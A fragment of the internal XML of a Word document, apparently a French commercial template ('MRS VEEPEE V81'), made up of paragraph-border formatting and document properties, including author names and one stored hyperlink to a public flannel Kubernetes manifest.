            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1891963127">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1620648561">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1738674000">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1888563134">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1950812841">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="200515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eader" Target="head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59.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falzon.VEEPEE\Bureau\MRS%20VEEPEE%20V8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DA8BC-A8F0-4F40-BD29-F49DAD90C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MRS VEEPEE V81.dot</Template>
  <TotalTime>13</TotalTime>
  <Pages>27</Pages>
  <Words>2611</Words>
  <Characters>14366</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>119</Lines>
  <Paragraphs>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Modèle MRS VEEPEE V81 B</vt:lpstr>
      <vt:lpstr>Modèle MRS VEEPEE V81 B</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager>Version commerciale VeePee</Manager>
  <Company>ARTECOMM - Tel : 04 50 52 05 03</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16944</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:i4>7077935</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>54</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://raw.githubusercontent.com/flannel-io/flannel/master/Documentation/kube-flannel.yml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MRS VEEPEE V81 B</dc:title>
  <dc:subject>Version 8.1 B - 17/08/2007</dc:subject>
  <dc:creator>Alex FALZON</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yann BHR</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <cp:lastPrinted>2007-05-27T14:42:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-28T12:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-13T13:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>